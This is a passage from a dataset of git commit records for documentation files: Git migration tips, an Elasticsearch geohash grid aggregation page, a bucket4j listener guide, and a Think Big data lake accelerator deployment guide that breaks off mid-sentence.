repository*. You can't do partial checkouts, contrary to SVN (check the note below for a precision on this point).\n\nThen, thinking to http:\/\/git-scm.com\/about[the advantages of the migration], they decided the reduce the size of the project, by cleaning dead code.\nWith that, the 2nd conclusion was let's go to Git!\n\n\n== Tips and things to remember\n\n* With Git, less disk space is required. +\nAs for Git, *branch are only pointers*, contrary to SVN where they are file system copies.\n* Beware of the whole project size! + \nContrary to SVN, Git doesn't allow partial checkouts (feature called http:\/\/svnbook.red-bean.com\/en\/1.7\/svn.advanced.sparsedirs.html[_sparse directories_] in SVN). +\nSo, do not forget the housekeeping, and *clean dead code*!\n+\n[NOTE]\n====\nTo be more precised, since version 1.7.0, Git also enables sparce checkouts *for the working directory* (check http:\/\/schacon.github.io\/git\/git-read-tree.html#_sparse_checkout[here]).\nUnfortunately, *it does not affect the size of the overall local repository* (you *WILL* get the whole thing).\n====\n* Beware of https:\/\/help.github.com\/articles\/dealing-with-line-endings\/[line endings configuration].\n* Beware of the *encoding of your merge tool*. +\nThink to configure it to use UTF-8.\n* *get the `.git` out ouf the Eclipse workspace*, so as not to slow your IDE too much.\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e53405f4f37f04d33a430caa1bbd7e0b742256f9","subject":"Update geohashgrid-aggregation.asciidoc (#21530)","message":"Update geohashgrid-aggregation.asciidoc (#21530)\n","repos":"henakamaMSFT\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,artnowo\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,JSCooke\/elasticsearch,C-Bish\/elasticsearch,IanvsPoplicola\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,StefanGor\/elasticsearch,MaineC\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,uschindler\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,JervyShi\/elasticsearch,spiegela\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,a2lin\/elasticsearch,bawse\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,JackyMai\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,Shepard1212\/elasticsearch,jprante\/elasticsearch,scorpionvicky\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,obourgain\/elasticsearch,geidies\/elasticsearch,Stacey-Gammon\/elasticsearch,henakamaMSFT\/elasticsearch,qwerty4030\/elasticsearch,ZTE-PaaS\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,rlugojr\/elasticsearch,yanjunh\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,Helen-Zhao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,artnowo\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,IanvsPoplicola\/elasticsearch,fernandozhu\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,masaruh\/elasticsearch,rlugojr\/elasticsearch,MisterAndersen\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,gfyoung\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,yanjunh\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,mortonsykes\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,fforbeck\/elasticsearch,shreejay\/elasticsearch,spiegela\/elasticsearch,mjason3\/elasticsearch,JackyMai\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,MaineC\/elasticsearch,IanvsPoplicola\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,mikemccand\/elasticsearch,nazarewk\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,nilabhsagar\/elasticsearch,JervyShi\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,wangtuo\/elasticsearch,MisterAndersen\/elasticsearch,elasticdog\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,gfyoung\/elasticsearch,artnowo\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/geohashgrid-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/geohashgrid-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-geohashgrid-aggregation]]\n=== GeoHash grid Aggregation\n\nA multi-bucket aggregation that works on `geo_point` fields and groups points into buckets that represent cells in a grid.\nThe resulting grid can be sparse and only contains cells that have matching data. Each cell is labeled using a http:\/\/en.wikipedia.org\/wiki\/Geohash[geohash] which is of user-definable precision.\n\n* High precision geohashes have a long string length and represent cells that cover only a small area.\n* Low precision geohashes have a short string length and represent cells that each cover a large area.\n\nGeohashes used in this aggregation can have a choice of precision between 1 and 12.\n\nWARNING: The highest-precision geohash of length 12 produces cells that cover less than a square metre of land and so high-precision requests can be very costly in terms of RAM and result sizes.\nPlease see the example below on how to first filter the aggregation to a smaller geographic area before requesting high-levels of detail.\n\nThe specified field must be of type `geo_point` (which can only be set explicitly in the mappings) and it can also hold an array of `geo_point` fields, in which case all points will be taken into account during aggregation.\n\n\n==== Simple low-precision request\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"myLarge-GrainGeoHashGrid\" : {\n \"geohash_grid\" : {\n \"field\" : \"location\",\n \"precision\" : 3\n }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\": {\n \"myLarge-GrainGeoHashGrid\": {\n \"buckets\": [\n {\n \"key\": \"svz\",\n \"doc_count\": 10964\n },\n {\n \"key\": \"sv8\",\n \"doc_count\": 3198\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\n\n\n==== High-precision requests\n\nWhen requesting detailed buckets (typically for displaying a \"zoomed in\" map) a filter like <<query-dsl-geo-bounding-box-query,geo_bounding_box>> should be applied to narrow the subject area otherwise potentially millions of buckets will be created and returned.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"zoomedInView\" : {\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"location\" : {\n \"top_left\" : \"51.73, 0.9\",\n \"bottom_right\" : \"51.55, 1.1\"\n }\n }\n },\n \"aggregations\":{\n \"zoom1\":{\n \"geohash_grid\" : {\n \"field\":\"location\",\n \"precision\":8\n }\n }\n }\n }\n }\n }\n--------------------------------------------------\n\n==== Cell dimensions at the equator\nThe table below shows the metric dimensions for cells covered by various string lengths of geohash.\nCell dimensions vary with latitude and so the table is for the worst-case scenario at the equator.\n\n[horizontal]\n*GeoHash length*::\t*Area width x height*\n1::\t 5,009.4km x 4,992.6km\n2::\t 1,252.3km x 624.1km\n3::\t 156.5km x 156km\n4::\t 39.1km x 19.5km\n5::\t 4.9km x 4.9km\n6::\t 1.2km x 609.4m\n7::\t 152.9m x 152.4m\n8::\t 38.2m x 19m\n9::\t 4.8m x 4.8m\n10::\t1.2m x 59.5cm\n11::\t14.9cm x 14.9cm\n12::\t3.7cm x 1.9cm\n\n\n\n==== Options\n\n[horizontal]\nfield:: Mandatory. The name of the field indexed with GeoPoints.\n\nprecision:: Optional. The string length of the geohashes used to define\n cells\/buckets in the results. Defaults to 5.\n\nsize:: Optional. The maximum number of geohash buckets to return\n (defaults to 10,000). When results are trimmed, buckets are\n prioritised based on the volumes of documents they contain.\n\nshard_size:: Optional. To allow for more accurate counting of the top cells\n returned in the final result the aggregation defaults to\n returning `max(10,(size x number-of-shards))` buckets from each\n shard. If this heuristic is undesirable, the number considered\n from each shard can be over-ridden using this parameter.\n","old_contents":"[[search-aggregations-bucket-geohashgrid-aggregation]]\n=== GeoHash grid Aggregation\n\nA multi-bucket aggregation that works on `geo_point` fields and groups points into buckets that represent cells in a grid.\nThe resulting grid can be sparse and only contains cells that have matching data. Each cell is labeled using a http:\/\/en.wikipedia.org\/wiki\/Geohash[geohash] which is of user-definable precision.\n\n* High precision geohashes have a long string length and represent cells that cover only a small area.\n* Low precision geohashes have a short string length and represent cells that each cover a large area.\n\nGeohashes used in this aggregation can have a choice of precision between 1 and 12.\n\nWARNING: The highest-precision geohash of length 12 produces cells that cover less than a square metre of land and so high-precision requests can be very costly in terms of RAM and result sizes.\nPlease see the example below on how to first filter the aggregation to a smaller geographic area before requesting high-levels of detail.\n\nThe specified field must be of type `geo_point` (which can only be set explicitly in the mappings) and it can also hold an array of `geo_point` fields, in which case all points will be taken into account during aggregation.\n\n\n==== Simple low-precision request\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"myLarge-GrainGeoHashGrid\" : {\n \"geohash_grid\" : {\n \"field\" : \"location\",\n \"precision\" : 3\n }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\": {\n \"myLarge-GrainGeoHashGrid\": {\n \"buckets\": [\n {\n \"key\": \"svz\",\n \"doc_count\": 10964\n },\n {\n \"key\": \"sv8\",\n \"doc_count\": 3198\n }\n ]\n }\n }\n}\n--------------------------------------------------\n\n\n\n==== High-precision requests\n\nWhen requesting detailed buckets (typically for displaying a \"zoomed in\" map) a filter like <<query-dsl-geo-bounding-box-query,geo_bounding_box>> should be applied to narrow the subject area otherwise potentially millions of buckets will be created and returned.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggregations\" : {\n \"zoomedInView\" : {\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"location\" : {\n \"top_left\" : \"51.73, 0.9\",\n \"bottom_right\" : \"51.55, 1.1\"\n }\n }\n },\n \"aggregations\":{\n \"zoom1\":{\n \"geohash_grid\" : {\n \"field\":\"location\",\n \"precision\":8,\n }\n }\n }\n }\n }\n }\n--------------------------------------------------\n\n==== Cell dimensions at the equator\nThe table below shows the metric dimensions for cells covered by various string lengths of geohash.\nCell dimensions vary with latitude and so the table is for the worst-case scenario at the equator.\n\n[horizontal]\n*GeoHash length*::\t*Area width x height*\n1::\t 5,009.4km x 4,992.6km\n2::\t 1,252.3km x 624.1km\n3::\t 156.5km x 156km\n4::\t 39.1km x 19.5km\n5::\t 4.9km x 4.9km\n6::\t 1.2km x 609.4m\n7::\t 152.9m x 152.4m\n8::\t 38.2m x 19m\n9::\t 4.8m x 4.8m\n10::\t1.2m x 59.5cm\n11::\t14.9cm x 14.9cm\n12::\t3.7cm x 1.9cm\n\n\n\n==== Options\n\n[horizontal]\nfield:: Mandatory. The name of the field indexed with GeoPoints.\n\nprecision:: Optional. The string length of the geohashes used to define\n cells\/buckets in the results. Defaults to 5.\n\nsize:: Optional. The maximum number of geohash buckets to return\n (defaults to 10,000). When results are trimmed, buckets are\n prioritised based on the volumes of documents they contain.\n\nshard_size:: Optional. To allow for more accurate counting of the top cells\n returned in the final result the aggregation defaults to\n returning `max(10,(size x number-of-shards))` buckets from each\n shard. If this heuristic is undesirable, the number considered\n from each shard can be over-ridden using this parameter.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d22a70fbfd101a96cf7e7abac7aad5c5fae6937a","subject":"listener.adoc","message":"listener.adoc\n","repos":"vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j","old_file":"asciidoc\/src\/main\/docs\/asciidoc\/advanced\/listener.adoc","new_file":"asciidoc\/src\/main\/docs\/asciidoc\/advanced\/listener.adoc","new_contents":"[[listener]]\n=== Listening for bucket events\n\n==== What can be listened\n.You can decorate the bucket by listener to track following events:\n- When tokens are consumed from a bucket.\n- When consumption requests were rejected by the bucket.\n- When the thread was parked to wait for tokens refill as a result of interaction with ``BlockingBucket``.\n- When the thread was interrupted during the wait for tokens to be refilled as a result of interaction with ``BlockingBucket``.\n- When a delayed task was submitted to ``ScheduledExecutorService`` as a result of interaction with ``AsyncScheduledBucket``.\n\n==== Listener API - corner cases\n========\n**Question:** How many listeners are needed to create an application that uses many buckets?\n\n**Answer:** it depends:\n\n- If you want to have aggregated statistics for all buckets then create a single listener per application and reuse this listener for all buckets.\n- If you want to measure statistics independently per bucket then use a listener per bucket model.\n========\n\n========\n**Question:** where are methods the listener is invoking in case of distributed usage?\n\n**Answer:** listener always invoked on the client-side, which means that each client JVM will have its independent stat for the same bucket.\n========\n\n========\n**Question:** Why does bucket invoke the listener on the client-side instead of the server-side in case of distributed scenario? What do I need to do if I need an aggregated stat across the whole cluster?\n\n**Answer:** Because of a planned expansion to non-JVM back-ends such as Redis, MySQL, PostgreSQL.\nIt is not possible to serialize and invoke listener on this non-java back-ends, so it was decided to invoke listener on the client-side,\nto avoid inconsistency between different back-ends in the future.\nYou can do post-aggregation of monitoring statistics via features built into your monitoring database or via mediator(like StatsD) between your application and the monitoring database.\n========\n\n==== How to attach a listener to a bucket?\nThe bucket can be decorated by the listener via the ``toListenable`` method.\n[source, java]\n----\nBucketListener listener = new MyListener();\n\nBucket bucket = Bucket.builder()\n .addLimit(Bandwidth.simple(100, Duration.ofMinutes(1)))\n .build()\n .toListenable(listener);\n----\n\n==== Example of integration with Dropwizard metrics-core\n`io.github.bucket4j.SimpleBucketListener` is a simple implementation of `io.github.bucket4j.BucketListener` interface that is available out of the box. Below is the example of exposing statistics via Dropwizard Metrics(for Micrometer it should be quite similar):\n[source, java]\n----\npublic static Bucket decorateBucketByStatListener(Bucket originalBucket, String bucketName, MetricRegistry registry) {\n SimpleBucketListener stat = new SimpleBucketListener();\n registry.register(name + \".consumed\", (Gauge<Long>) stat::getConsumed);\n registry.register(name + \".rejected\", (Gauge<Long>) stat::getRejected);\n registry.register(name + \".parkedNanos\", (Gauge<Long>) stat::getParkedNanos);\n registry.register(name + \".interrupted\", (Gauge<Long>) stat::getInterrupted);\n registry.register(name + \".delayedNanos\", (Gauge<Long>) stat::getDelayedNanos);\n\n return originalBucket.toListenable(stat);\n}\n----\n","old_contents":"[[listener]]\n=== Listening for bucket events\n\n==== What can be listened\n.You can decorate the bucket by listener in order to track following events:\n- When tokens are consumed from a bucket.\n- When consumption requests were rejected by the bucket.\n- When thread was parked to wait for tokens refill as a result of interaction with ``BlockingBucket``.\n- When thread was interrupted during the wait for tokens to be refilled as a result of interaction with ``BlockingBucket``.\n- When a delayed task was submitted to ``ScheduledExecutorService`` as a result of interaction with ``AsyncScheduledBucket``.\n\n==== Listener API - corner cases\n========\n**Question:** How many listeners are needed to create an application that uses many buckets?\n\n**Answer:** it depends:\n\n- If you want to have aggregated statistics for all buckets then create a single listener per application and reuse this listener for all buckets.\n- If you want to measure statistics independently per each bucket then use a listener per bucket model.\n========\n\n========\n**Question:** where are methods the listener is invoking in case of distributed usage?\n\n**Answer:** listener always invoked on client side, it means that each client JVM will have its own totally independent stat for the same bucket.\n========\n\n========\n**Question:** Why does bucket invoke the listener on client side instead of server side in case of distributed scenario? What do I need to do if I need an aggregated stat across the whole cluster?\n\n**Answer:** Because of planned expansion to non-JVM back-ends such as Redis, MySQL, PostgreSQL.\nIt is not possible to serialize and invoke listener on this non-java back-ends, so it was decided to invoke listener on client side,\nin order to avoid inconsistency between different back-ends in the future.\nYou can do post-aggregation of monitoring statistics via features built-into your monitoring database or via mediator(like StatsD) between your application and monitoring database.\n========\n\n==== How to attach a listener to a bucket?\nThe bucket can be decorated by the listener via the ``toListenable`` method.\n[source, java]\n----\nBucketListener listener = new MyListener();\n\nBucket bucket = Bucket.builder()\n .addLimit(Bandwidth.simple(100, Duration.ofMinutes(1)))\n .build()\n .toListenable(listener);\n----\n\n==== Example of integration with Dropwizard metrics-core\n`io.github.bucket4j.SimpleBucketListener` is a simple implementation of `io.github.bucket4j.BucketListener` interface that is available out of the box. Below the example of exposing statistics via Dropwizard Metrics(for Micrometer it should be quite similar):\n[source, java]\n----\npublic static Bucket decorateBucketByStatListener(Bucket originalBucket, String bucketName, MetricRegistry registry) {\n SimpleBucketListener stat = new SimpleBucketListener();\n registry.register(name + \".consumed\", (Gauge<Long>) stat::getConsumed);\n registry.register(name + \".rejected\", (Gauge<Long>) stat::getRejected);\n registry.register(name + \".parkedNanos\", (Gauge<Long>) stat::getParkedNanos);\n registry.register(name + \".interrupted\", (Gauge<Long>) stat::getInterrupted);\n registry.register(name + \".delayedNanos\", (Gauge<Long>) stat::getDelayedNanos);\n\n return originalBucket.toListenable(stat);\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa38dd1024a52c61f4638ef4eaf5f267c7285515","subject":"more changes to deployment guide","message":"more changes to deployment guide\n","repos":"rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,rashidaligee\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,Teradata\/kylo,rashidaligee\/kylo","old_file":"docs\/latest\/deployment-guide.adoc","new_file":"docs\/latest\/deployment-guide.adoc","new_contents":"= Data Lake Accelerator Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the Data Lake Accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on one edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing to a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTIP: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place on the host linux machine you want to install the data lake accelerator services on. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing elasticsearch installation or follow the steps in the elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n NOTE: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n\n \/opt\/nifi\/ext-config\/config.properties\n\n * spring.activemq.broker-url\n\n \/opt\/thinkbig\/thinkbig-services\/conf\/application\/properties\n\n * jms.activemq.broker.url\n\n\n7. Install NiFI\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== My SQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting of the Pipeline Controller Service using the PIPELINE_APPLICATION_OPTS environment variable. \n\n export THINKBIG_UI_OPTS=Xmx4g\n export THINKBIG_SERVICES_OPTS=Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: These below are installed as services and should start and stop automatically when the machine is 